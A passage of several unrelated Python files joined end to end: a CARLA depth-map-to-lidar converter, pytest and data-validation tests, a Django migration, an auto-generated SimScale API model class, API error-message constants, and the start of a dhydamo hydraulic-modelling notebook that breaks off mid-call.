ray angles and depth values cHead = get_coordinates(vHead,angles) cTail = get_coordinates(vTail,angles) cLeft = get_coordinates(vLeft,angles) cRight = get_coordinates(vRight,angles) # Rotate points according to the camera directions cTail = rotate_z(cTail,180) cLeft = rotate_z(cLeft,-90) cRight = rotate_z(cRight,90) # Concatenate points from all cameras and save as image pointCloud = np.concatenate((cHead,cTail,cLeft,cRight),0) return pointCloud def get_pixel_values(values, x_coords, y_coords): x_coords = x_coords.astype(int) y_coords = np.ceil(y_coords).astype(int) - 1 n_points = len(x_coords) pixel_values = np.zeros([n_points, 1]) for i in range(n_points): pixel_values[i] = values[y_coords[i], x_coords[i]] return pixel_values def get_relevant_coordinates(): """Returns a numpy ndarray specifying the pixel a lidar ray hits when shot through the near plane.""" coords_and_angles = np.genfromtxt('coords_and_angles.csv', delimiter=',') return np.hsplit(coords_and_angles,2) def decode_depthmap(depth_map, far_plane_distance): """Decode CARLA-encoded depth values into meters.""" depth_map = depth_map[:,:,0] + 256*depth_map[:,:,1] + (256*256)*depth_map[:,:,2]; depth_map = depth_map / (256*256*256-1); depth_map = depth_map * far_plane_distance; return depth_map def spherical_to_cartesian(azimuth, elevation, radius): """Convert spherical coordinates into cartesian x,y and z coordinates""" x = radius * np.cos(elevation) * np.cos(azimuth) y = radius * np.cos(elevation) * np.sin(azimuth) z = radius * np.sin(elevation) return np.array([x,y,z]) def get_coordinates(values, angles): """Convert depth map values into corresponding lidar measurements.""" coordinates = np.zeros((len(angles),3)) for i in range(len(angles)-1): v = np.radians(angles[i,0]) h = np.radians(angles[i,1]) r = values[i] # Correction for differences between lidar and depthmaps measurements # TODO this might as well be done in advance correctionConstant = 1 / (np.cos(h) * np.cos(v)) r = r * correctionConstant # Calculate cartesian coordinates coordinates[i,:] = np.transpose(spherical_to_cartesian(h,v,r)) return coordinates if __name__ == "__main__": main()
import pytest from datums_warehouse.scripts.update import update_pairs class WarehouseSpy: def __init__(self): self.received_pairs = [] def update(self, pair): import time import random time.sleep(random.uniform(0.01, 0.1)) self.received_pairs.append(pair) @pytest.fixture def warehouse(): return WarehouseSpy() @pytest.fixture(autouse=True) def inject_warehouse(monkeypatch, warehouse): import datums_warehouse.scripts.update as mut monkeypatch.setattr(mut, 'make_warehouse', lambda cfg: warehouse) return warehouse def test_update_single_pair(warehouse): update_pairs(warehouse, ['pair']) assert warehouse.received_pairs == ['pair'] def test_update_multiple_pairs(warehouse): update_pairs(warehouse, ['A', 'B']) assert {'A', 'B'} == set(warehouse.received_pairs)
from tests.unit.dataactcore.factories.staging import DetachedAwardFinancialAssistanceFactory from tests.unit.dataactvalidator.utils import number_of_errors, query_columns _FILE = 'fabs43_detached_award_financial_assistance_2' def test_column_headers(database): expected_subset = {'row_number', 'place_of_performance_zip4a', 'place_of_performance_congr', 'place_of_perform_country_c', 'record_type', 'uniqueid_AssistanceTransactionUniqueKey'} actual = set(query_columns(_FILE, database)) assert expected_subset == actual def test_success(database): """ If no PrimaryPlaceOfPerformanceZIP+4 is provided, a PrimaryPlaceOfPerformanceCongressionalDistrict must be provided. Only applies to domestic records and aggregate or non-aggregate records (RecordType = 1 or 2). """ det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr='01', place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='') det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a=None, place_of_performance_congr='01', place_of_perform_country_c='USA', record_type=2, correction_delete_indicatr=None) det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='123454321', place_of_performance_congr='', place_of_perform_country_c='usa', record_type=1, correction_delete_indicatr='c') det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='123454321', place_of_performance_congr=None, place_of_perform_country_c='USA', record_type=2, correction_delete_indicatr='C') det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='12345', place_of_performance_congr='02', place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='') # Testing foreign places are ignored det_award_6 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr='', place_of_perform_country_c='uK', record_type=1, correction_delete_indicatr='') det_award_7 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='city-wide', place_of_performance_congr='', place_of_perform_country_c='uK', record_type=2, correction_delete_indicatr='') # Testing record type 3 entries are ignored det_award_8 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr='', place_of_perform_country_c='USA', record_type=3, correction_delete_indicatr='') # Ignore correction delete indicator of D det_award_9 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr='', place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='d') errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5, det_award_6, det_award_7, det_award_8, det_award_9]) assert errors == 0 def test_failure(database): """ Test failure for if no PrimaryPlaceOfPerformanceZIP+4 is provided, a PrimaryPlaceOfPerformanceCongressionalDistrict must be provided. Only applies to domestic records and aggregate or non-aggregate records (RecordType = 1 or 2). """ det_award_1 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr='', place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='') det_award_2 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a=None, place_of_performance_congr='', place_of_perform_country_c='UsA', record_type=2, correction_delete_indicatr=None) det_award_3 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='', place_of_performance_congr=None, place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='c') det_award_4 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a=None, place_of_performance_congr=None, place_of_perform_country_c='USA', record_type=2, correction_delete_indicatr='C') det_award_5 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='city-wide', place_of_performance_congr=None, place_of_perform_country_c='USA', record_type=1, correction_delete_indicatr='') det_award_6 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='city-wide', place_of_performance_congr='', place_of_perform_country_c='USA', record_type=2, correction_delete_indicatr='') det_award_7 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='12345', place_of_performance_congr='', place_of_perform_country_c='usa', record_type=1, correction_delete_indicatr='') det_award_8 = DetachedAwardFinancialAssistanceFactory(place_of_performance_zip4a='12345', place_of_performance_congr=None, place_of_perform_country_c='USA', record_type=2, correction_delete_indicatr='') errors = number_of_errors(_FILE, database, models=[det_award_1, det_award_2, det_award_3, det_award_4, det_award_5, det_award_6, det_award_7, det_award_8]) assert errors == 8
# Package.
# Generated by Django 3.0.6 on 2020-05-04 22:06 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('main', '0002_config_name'), ] operations = [ migrations.RemoveField( model_name='config', name='enable', ), ]
__author__ = 'yuy001' #!/usr/bin/env python a = ["cat","dog", "rat", "cow", "horse"] a.append("elephant") print a
# Copyright 2022 The AI Flow Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from ai_flow_plugins.job_plugins import bash import ai_flow as af # Initialize the project and workflow environment. af.init_ai_flow_context() # Define a job with job_1 config. with af.job_config('job_1'): # Define the bash job. af.user_define_operation(processor=bash.BashProcessor(bash_command='echo "Hello World!"'))
# coding: utf-8 """ SimScale API The version of the OpenAPI document: 0.0.0 Generated by: https://openapi-generator.tech """ import pprint import re # noqa: F401 import six from simscale_sdk.configuration import Configuration class OneOfFrequencyAnalysisBoundaryConditions(object): """NOTE: This class is auto generated by OpenAPI Generator. Ref: https://openapi-generator.tech Do not edit the class manually. """ """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ openapi_types = { 'type': 'str', 'name': 'str', 'preload': 'ForcePreload', 'topological_reference': 'TopologicalReference', 'spring_stiffness': 'OneOfElasticSupportBCSpringStiffness', 'displacement': 'DimensionalPartialVectorFunctionLength', 'rotation': 'DimensionalPartialVectorFunctionAngle', 'external_point': 'DimensionalVectorLength', 'deformation_behavior': 'str' } attribute_map = { 'type': 'type', 'name': 'name', 'preload': 'preload', 'topological_reference': 'topologicalReference', 'spring_stiffness': 'springStiffness', 'displacement': 'displacement', 'rotation': 'rotation', 'external_point': 'externalPoint', 'deformation_behavior': 'deformationBehavior' } discriminator_value_class_map = { 'BOLT_PRELOAD': 'BoltPreloadBC', 'ELASTIC_SUPPORT': 'ElasticSupportBC', 'FIXED_SUPPORT': 'FixedSupportBC', 'FIXED_VALUE': 'FixedValueBC', 'REMOTE_DISPLACEMENT_LOAD': 'RemoteDisplacementLoadBC', 'SYMMETRY_PLANE': 'SymmetryPlaneBC' } def __init__(self, type='SYMMETRY_PLANE', name=None, preload=None, topological_reference=None, spring_stiffness=None, displacement=None, rotation=None, external_point=None, deformation_behavior=None, local_vars_configuration=None): # noqa: E501 """OneOfFrequencyAnalysisBoundaryConditions - a model defined in OpenAPI""" # noqa: E501 if local_vars_configuration is None: local_vars_configuration = Configuration() self.local_vars_configuration = local_vars_configuration self._type = None self._name = None self._preload = None self._topological_reference = None self._spring_stiffness = None self._displacement = None self._rotation = None self._external_point = None self._deformation_behavior = None self.discriminator = 'type' self.type = type if name is not None: self.name = name if preload is not None: self.preload = preload if topological_reference is not None: self.topological_reference = topological_reference if spring_stiffness is not None: self.spring_stiffness = spring_stiffness if displacement is not None: self.displacement = displacement if rotation is not None: self.rotation = rotation if external_point is not None: self.external_point = external_point if deformation_behavior is not None: self.deformation_behavior = deformation_behavior @property def type(self): """Gets the type of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 This boundary condition restrains the displacement of a face in its normal direction in order to represent a symmetry plane of the structure. Use this boundary condition to reduce the model size significantly if the geometry and the loading conditions are symmetric.<br /><br />Important remarks: <br /><ul><li>The solver uses linear relations between all three DOFs to constrian the normal movement, thus overcontraint conditions may appear if the edges of the selected faces are constrained by other displacement boundary conditions.</li><li>If the assigned faces are orthogonal to a global coordinate axes, it is recommended to directly specifiy the symmetry conditions with a <b>Fixed value</b> boundary condition.</li></ul><a href= https://www.simscale.com/docs/simulation-setup/boundary-conditions/symmetry/#symmetry-plane-boundary-condition-fea' target='_blank'>Learn more</a>. Schema name: SymmetryPlaneBC # noqa: E501 :return: The type of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: str """ return self._type @type.setter def type(self, type): """Sets the type of this OneOfFrequencyAnalysisBoundaryConditions. This boundary condition restrains the displacement of a face in its normal direction in order to represent a symmetry plane of the structure. Use this boundary condition to reduce the model size significantly if the geometry and the loading conditions are symmetric.<br /><br />Important remarks: <br /><ul><li>The solver uses linear relations between all three DOFs to constrian the normal movement, thus overcontraint conditions may appear if the edges of the selected faces are constrained by other displacement boundary conditions.</li><li>If the assigned faces are orthogonal to a global coordinate axes, it is recommended to directly specifiy the symmetry conditions with a <b>Fixed value</b> boundary condition.</li></ul><a href= https://www.simscale.com/docs/simulation-setup/boundary-conditions/symmetry/#symmetry-plane-boundary-condition-fea' target='_blank'>Learn more</a>. Schema name: SymmetryPlaneBC # noqa: E501 :param type: The type of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501 raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501 self._type = type @property def name(self): """Gets the name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: str """ return self._name @name.setter def name(self, name): """Sets the name of this OneOfFrequencyAnalysisBoundaryConditions. :param name: The name of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ self._name = name @property def preload(self): """Gets the preload of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The preload of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: ForcePreload """ return self._preload @preload.setter def preload(self, preload): """Sets the preload of this OneOfFrequencyAnalysisBoundaryConditions. :param preload: The preload of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: ForcePreload """ self._preload = preload @property def topological_reference(self): """Gets the topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: TopologicalReference """ return self._topological_reference @topological_reference.setter def topological_reference(self, topological_reference): """Sets the topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. :param topological_reference: The topological_reference of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: TopologicalReference """ self._topological_reference = topological_reference @property def spring_stiffness(self): """Gets the spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: OneOfElasticSupportBCSpringStiffness """ return self._spring_stiffness @spring_stiffness.setter def spring_stiffness(self, spring_stiffness): """Sets the spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. :param spring_stiffness: The spring_stiffness of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: OneOfElasticSupportBCSpringStiffness """ self._spring_stiffness = spring_stiffness @property def displacement(self): """Gets the displacement of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The displacement of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: DimensionalPartialVectorFunctionLength """ return self._displacement @displacement.setter def displacement(self, displacement): """Sets the displacement of this OneOfFrequencyAnalysisBoundaryConditions. :param displacement: The displacement of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalPartialVectorFunctionLength """ self._displacement = displacement @property def rotation(self): """Gets the rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: DimensionalPartialVectorFunctionAngle """ return self._rotation @rotation.setter def rotation(self, rotation): """Sets the rotation of this OneOfFrequencyAnalysisBoundaryConditions. :param rotation: The rotation of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalPartialVectorFunctionAngle """ self._rotation = rotation @property def external_point(self): """Gets the external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :return: The external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: DimensionalVectorLength """ return self._external_point @external_point.setter def external_point(self, external_point): """Sets the external_point of this OneOfFrequencyAnalysisBoundaryConditions. :param external_point: The external_point of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: DimensionalVectorLength """ self._external_point = external_point @property def deformation_behavior(self): """Gets the deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 <p>Choose the deformation behavior of the assigned entity. If <b>deformable</b> is selected, the entitiy is allowed to deform, selecting <b>undeformable</b> leads to a rigid entity.</p> # noqa: E501 :return: The deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :rtype: str """ return self._deformation_behavior @deformation_behavior.setter def deformation_behavior(self, deformation_behavior): """Sets the deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. <p>Choose the deformation behavior of the assigned entity. If <b>deformable</b> is selected, the entitiy is allowed to deform, selecting <b>undeformable</b> leads to a rigid entity.</p> # noqa: E501 :param deformation_behavior: The deformation_behavior of this OneOfFrequencyAnalysisBoundaryConditions. # noqa: E501 :type: str """ allowed_values = ["DEFORMABLE", "UNDEFORMABLE"] # noqa: E501 if self.local_vars_configuration.client_side_validation and deformation_behavior not in allowed_values: # noqa: E501 raise ValueError( "Invalid value for `deformation_behavior` ({0}), must be one of {1}" # noqa: E501 .format(deformation_behavior, allowed_values) ) self._deformation_behavior = deformation_behavior def get_real_child_model(self, data): """Returns the real base class specified by the discriminator""" discriminator_key = self.attribute_map[self.discriminator] discriminator_value = data[discriminator_key] return self.discriminator_value_class_map.get(discriminator_value) def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, OneOfFrequencyAnalysisBoundaryConditions): return False return self.to_dict() == other.to_dict() def __ne__(self, other): """Returns true if both objects are not equal""" if not isinstance(other, OneOfFrequencyAnalysisBoundaryConditions): return True return self.to_dict() != other.to_dict()
import logging from performance.driver.core.config import Configurable from performance.driver.core.eventbus import EventBusSubscriber class Runner(Configurable, EventBusSubscriber): """ A Run controller controls the overall execution of the test suite. This abstraction allows the tests to continue until enough data are collected for reasonable statistical translation. """ def __init__(self, config, generalConfig, eventbus): """ Initialize reporter """ Configurable.__init__(self, config) EventBusSubscriber.__init__(self, eventbus) self.generalConfig = generalConfig self.logger = logging.getLogger('Reporter<{}>'.format(type(self).__name__)) def dump(self, summarizer): """ Extract data from the summarizer and dump it to the reporter """ pass class ConsoleReporter(Reporter): """ The simplest, console-only reporter """ def dump(self, summarizer): print(summarizer.sum())
# Define custom error messages here EMAIL_IN_USE = ({'message': 'User with that email already exists'}, 409) UNAUTHORIZED = ( {'message': 'Authentication is required to access this resource', 'type': 'UNAUTHORIZED'}, 401) BAD_CREDENTIALS = ( {'message': 'Incorrect username or password', 'type': 'BAD_CREDENTIALS'}, 401) FORBIDDEN = ({'message': 'Access to this resource is forbidden'}, 403) RESET_PASSWORD_CODE_NOT_VALID = ( {'message': 'Valid code is required to reset a password'}, 418) TOO_MANY_REQUESTS = ({'message': 'Too many requests'}, 429) EVENT_NOT_FOUND = ({'message': 'No event exists with that ID'}, 404) EVENT_WITH_KEY_NOT_FOUND = ({'message': 'No event exists with that KEY'}, 404) EVENT_WITH_TRANSLATION_NOT_FOUND = ({'message': 'Translation for event not found'}, 404) EVENT_MUST_CONTAIN_TRANSLATION = ({'message': "Event must contain at least one translation for 'name' and 'description'"}, 400) EVENT_TRANSLATION_MISMATCH = ({'message': "Event must contain same translations for 'name' and 'description'"}, 400) REFRERENCE_REQUEST_WITH_TOKEN_NOT_FOUND = ({'message': 'No Reference Request exists with that Token'}, 404) DUPLICATE_REFERENCE_SUBMISSION = ({'message': 'Reference Already submitted for this Request '}, 409) EVENT_KEY_IN_USE = ({'message': 'Event with that KEY already exists'}, 409) SECTION_NOT_FOUND = ({'message': 'No section exists with that Event ID'}, 404) QUESTION_NOT_FOUND = ( {'message': 'No question exists with that Event ID'}, 404) FORM_NOT_FOUND = ({'message': 'No form exists with that Event ID'}, 404) FORM_NOT_FOUND_BY_ID = ({'message': 'No application form exists with that Application Form ID'}, 404) RESPONSE_NOT_FOUND = ( {'message': 'No response found for the given event and user'}, 404) RESPONSE_ALREADY_SUBMITTED = ({'message': 'A response has already been submitted'}, 400) UPDATE_CONFLICT = ( {'message': 'The requested update conflicts with the existing resource'}, 409) DB_NOT_AVAILABLE = ({'message': 'Unable to access the database'}, 500) EMAIL_NOT_VERIFIED = ({'message': 'The email address is not verified'}, 422) EMAIL_VERIFY_CODE_NOT_VALID = ( {'message': 'Valid code is required to verify email'}, 419) USER_NOT_FOUND = ({'message': 'No user exists with that email'}, 404) RESET_PASSWORD_CODE_EXPIRED = ( {'message': 'The password reset request has expired'}, 400) FILE_SIZE_EXCEEDED = ({'message': 'File size exceeded'}, 400) USER_DELETED = ({'message': 'This account has been deleted'}, 404) REVIEW_RESPONSE_NOT_FOUND = ({'message': 'No review response found.'}, 404) ADD_VERIFY_TOKEN_FAILED = ( {'message': 'Unable to add verification token.'}, 500) ADD_INVITED_GUEST_FAILED = ( {'message': 'Unable to add invited guest.'}, 500) INVITED_GUEST_FOR_EVENT_EXISTS = ( {'message': 'Invited guest already exists for this event.'}, 409) VERIFY_EMAIL_INVITED_GUEST = ( {'message': 'Unable to verify email of invited guest.'}, 500) VERIFY_EMAIL_OFFER = ( {'message': 'Unable to verify email of an offer.'}, 500) MISSING_PASSWORD = ( {'message': 'Password not provided', 'type': 'MISSING_CREDENTIALS'}, 400) OFFER_EXPIRED = ({'message': 'Your offer has expired'}, 403) ADD_OFFER_FAILED = ( {'message': 'Unable to add an offer.'}, 500) OFFER_NOT_FOUND = ( {'message': 'No offer found for the given id'}, 404) REGISTRATION_FORM_NOT_FOUND = ( {'message': 'No registration form found for the given event and offer'}, 404) REGISTRATION_SECTION_NOT_FOUND = ( {'message': 'No registration section found for the given id'}, 404) REGISTRATION_QUESTION_NOT_FOUND = ( {'message': 'No registration question found for the given id'}, 404) ADD_REGISTRATION_FORM_FAILED = ( {'message': 'Unable to add registration form.'}, 500) ADD_REGISTRATION_SECTION_FAILED = ( {'message': 'Unable to add registration section.'}, 500) ADD_REGISTRATION_QUESTION_FAILED = ( {'message': 'Unable to add registration question.'}, 500) ADD_INVITATION_REQUEST_FAILED = ( {'message': 'Unable to add invitation letter request.'}, 500) TEMPLATE_NOT_FOUND = ( {'message': 'No template found for the given parameters'}, 404) OFFER_NOT_ACCEPTED = ( {'message': 'Offer has not been accepted'}, 409) APPLICATIONS_CLOSED = ( {'message': 'Applications are now closed'}, 403) DUPLICATE_OFFER = ( {'message': 'An offer already exists for the user_id and event_id'}, 409) CREATING_INVITATION_FAILED = ( {'message': 'Invitation Letter creation failed'}, 502) SENDING_INVITATION_FAILED = ( {'message': 'Invitation Letter failed to send'}, 502) EVENT_ID_NOT_FOUND = ( {'message': 'Event ID not found.'}, 404) MISSING_DATE_OF_BIRTH = ( {'message': 'Missing date of birth. Please update your user profile.'}, 400) REGISTRATION_NOT_FOUND = ( {'message': 'Registration not found. Please register first.'}, 404) EMAIL_NOT_SENT = ( {'message': 'Email failed to send'}, 500) INVITED_GUEST_EMAIL_FAILED = ( {'message': 'The invited guest was added added to the database, but the email failed to send. You may want to contact them manually.'}, 500) ATTENDANCE_ALREADY_CONFIRMED = ( {'message': 'Attendance has already been confirmed for this user and event.'}, 400) ATTENDANCE_NOT_FOUND = ( {'message': 'Attendance not found.'}, 404) ERROR_UPDATING_USER_PROFILE = ( {'message': 'Exception updating user profile.'}, 500) ADD_EVENT_ROLE_FAILED = ( {'message': 'Unable to add event role for the user_id and event_id.'}, 500) POLICY_NOT_AGREED = ( {'message': 'Privacy policy must be agreed to before continuing.'}, 400) POLICY_ALREADY_AGREED = ( {'message': 'Privacy policy has already been agreed to.'}, 400) REFERENCE_REQUEST_NOT_FOUND = ( {'message': 'No response found for the given event and user'}, 404) OUTCOME_NOT_FOUND = ( {'message': 'No outcome found for the given event'}, 404) OUTCOME_STATUS_NOT_VALID = ( {'message': 'Invalid outcome status specified'}, 400) CANDIDATE_REJECTED = ( {'message': 'The candidate has already been rejected for the event'}, 400) FAILED_CREATE_INTEGRATION_TEST_USER = ( {'message': 'Failed to create integration test user.'}, 500) FAILED_DELETE_INTEGRATION_TEST_USER = ( {'message': 'Failed to delete integration test user'}, 500) DUPLICATE_RESPONSE = ({'message': 'A response has already been submitted for this application form'}, 409) BAD_CONFIGURATION = ({'message': 'There is an error with the form configuration'}, 500) TAG_NOT_FOUND = ( {'message': 'No tag found with the given id'}, 404) REVIEW_FORM_NOT_FOUND = ({'message': "No review form found for the event"}, 404) REVIEW_ALREADY_COMPLETED = ({'message': "Can't delete reviewer, the review has already been completed"}, 400)
#!/usr/bin/env python # coding: utf-8 # ## Overview of functionalities # # This notebook gives an overview of the functionalities of the dhydamo module. # # For install instructions see: https://github.com/openearth/dhydamo#installation # # Note that the old version of the package (delft3dfmpy) will not be updated anymore and won't be available through GitHub. New features (RR-modelling, additional hydraulic structures, etc.), will be implemented in dhydamo. # # Furthermore, it should be noted that recently added features were tested with dummy-data, which is included with this package. The generated model is, therefore, not necessarily a correct hydraulic representation, as some dummy structures were added and existing structures moved and/or adjusted. The purpose of this notebook is solely to illustrate the usage of the dhydamo module. # ## Release notes # The following aspects are new compared to the previous version: # - culvert length is derived from HyDAMO setting in the GML file instead of the line geometry; # - spelling of parametrised is now consistent, i.e., "dflowfmmodel.paratemeterised" would now give an error; # - pumps now expect their margins in m+NAP instead of cm. I.e., the margins are now used directly to set the start/stoplevelsuctionside. Previously they were related to the 'streefwaarde'; # - Boundary conditions can be added to the model as 'dfmmodel.external_forcings.io.from_hydamo(hydamo.boundary_conditions)' instead of running 'add_boundary_condition' in a loop. This does not work (yet) for time series, only for constant boundary conditions # - structures bridge, universal weir, compound structure and orifice are added. # - the module was breaking down when pandas was updated to version 1.0.1. Workarounds were immplemented to avoid this. # - funcdtionality has been implemented to generate also the RR-components of a coupled RR-FM D-HYDRO model. # In[1]: # Basis import os import sys import shutil import numpy as np # Importing relevant classes from delft3dfmpy from delft3dfmpy import DFlowFMModel, HyDAMO, Rectangular, DFlowFMWriter from delft3dfmpy import DFlowRRModel, DFlowRRWriter from delft3dfmpy.datamodels.common import ExtendedGeoDataFrame #from delft3dfmpy import * # For reading SOBEK results as boundary conditions # hkvsobekpy requires the modules fire and tqdm, install these (conda install fire tqdm) import hkvsobekpy # shapefiles IO import geopandas as gpd # Import csv import pandas as pd # Geometries from shapely.geometry import Polygon, LineString # Plotting import matplotlib.pyplot as plt from matplotlib.collections import LineCollection get_ipython().run_line_magic('matplotlib', 'inline') # ### Read HYDAMO # # Note: the data are also added in zipped format, to be unzipped in case of errors with the downloaded gml-files. # # In the code section below the different parts or the HyDAMO gml are added. For more info on how to import the different elements from the HyDAMO gml, see: https://hkvconfluence.atlassian.net/wiki/spaces/DHYD/overview # # The general steps for importing the HyDAMO files are: # - Read the objects from the GML file. # - Snap the structures to the branches # - Remove non-snapped structures, perhaps because the distance to the nearest branch was too large. # # A few remarks: # - The converter requires a number of features with a specfic name. If the name in the gml does not match this name, it can be converted with the 'column_mapping' # - The branch or structure data can also be loaded from shapefiles. Note that shapefiles have a max column length o f10 characters, so probably a lot of column_mapping is necessary. # Change this path to access the data! # In[2]: # pad to the package containing the dummy-data pad = 'D:/3640.20/delft3dfmpy.git/trunk/data/' # In[3]: # initialize the class hydamo = HyDAMO(extent_file=pad+'gis/selectie_pilot.shp') # Branches hydamo.branches.read_gml(pad+'gml/hydroobject.gml', index_col='code', clip=hydamo.clipgeo) hydamo.branches['ruwheidstypecode'] = 4 # read from GML hydamo.crosssections.read_gml(pad+'gml/dwarsprofiel.gml' , column_mapping={'ruwheidswaardelaag':'ruwheidswaarde'} , index_col='profielcode' , groupby_column='profielcode' , order_column='codevolgnummer') hydamo.crosssections.snap_to_branch(hydamo.branches, snap_method='intersecting') hydamo.crosssections.dropna(axis=0, inplace=True, subset=['branch_offset']) hydamo.crosssections = hydamo.crosssections.drop(ExtendedGeoDataFrame(geotype=LineString),'code', index_col='profielcode',axis=1) hydamo.crosssections.rename(columns={'profielcode': 'code'}, inplace=True) hydamo.parametrised_profiles.read_gml(pad+'gml/NormGeparametriseerdProfiel.gml', column_mapping={'ruwheidswaardelaag': 'ruwheidswaarde'}) hydamo.parametrised_profiles.snap_to_branch(hydamo.branches, snap_method='intersecting') hydamo.parametrised_profiles.dropna(axis=0, inplace=True, subset=['branch_offset']) # # Bridges hydamo.bridges.read_gml(pad+'gml/brug.gml') hydamo.bridges.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=5) hydamo.bridges.dropna(axis=0, inplace=True, subset=['branch_offset']) # # Culverts hydamo.culverts.read_gml( pad+'gml/duikersifonhevel.gml', index_col='code', column_mapping={'vormkoker': 'vormcode'}, clip=hydamo.clipgeo ) hydamo.culverts.snap_to_branch(hydamo.branches, snap_method='ends', maxdist=5) hydamo.culverts.dropna(axis=0, inplace=True, subset=['branch_offset']) duikers_rekentijd = ['RS372-KDU3','RS375-KDU2','RS373-KDU7','RS373-KDU20','RS373-KDU22','RS373-KDU19'] duikers_gemalen = ['OWL32921-KDU3','RS375-KDU6'] hydamo.culverts = hydamo.culverts.drop(ExtendedGeoDataFrame(geotype=LineString),duikers_rekentijd, index_col='code', axis=0) hydamo.culverts = hydamo.culverts.drop(ExtendedGeoDataFrame(geotype=LineString),duikers_gemalen, index_col='code', axis=0) # Weirs (including universal weirs) hydamo.weirs.read_gml(pad+'gml/stuw.gml') hydamo.weirs.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=10) hydamo.weirs.dropna(axis=0, inplace=True, subset=['branch_offset']) # Orifices hydamo.orifices.read_gml(pad+'gml/onderspuier.gml') hydamo.orifices.snap_to_branch(hydamo.branches, snap_method='overal', maxdist=2) hydamo.orifices.dropna(axis=0, inplace=True, subset=['branch_offset']) # Closing devices / terugslagkleppen e.d. hydamo.afsluitmiddel.read_gml(pad+'gml/afsluitmiddel.gml', index_col='code') # Laterals (imported from shapefile) hydamo.laterals.read_shp(pad+'sobekdata/Sbk_S3BR_n.shp', column_mapping={'ID ': 'code', 'NAME ': 'name', 'X ':'X', 'Y ':'Y'}) hydamo.laterals.snap_to_branch(hydamo.branches, snap_method='overal', maxdist= 5) hydamo.laterals.dropna(axis=0, inplace=True, subset=['branch_offset']) # Pumps hydamo.gemalen.read_gml(pad+'gml/gemaal.gml', index_col='code', 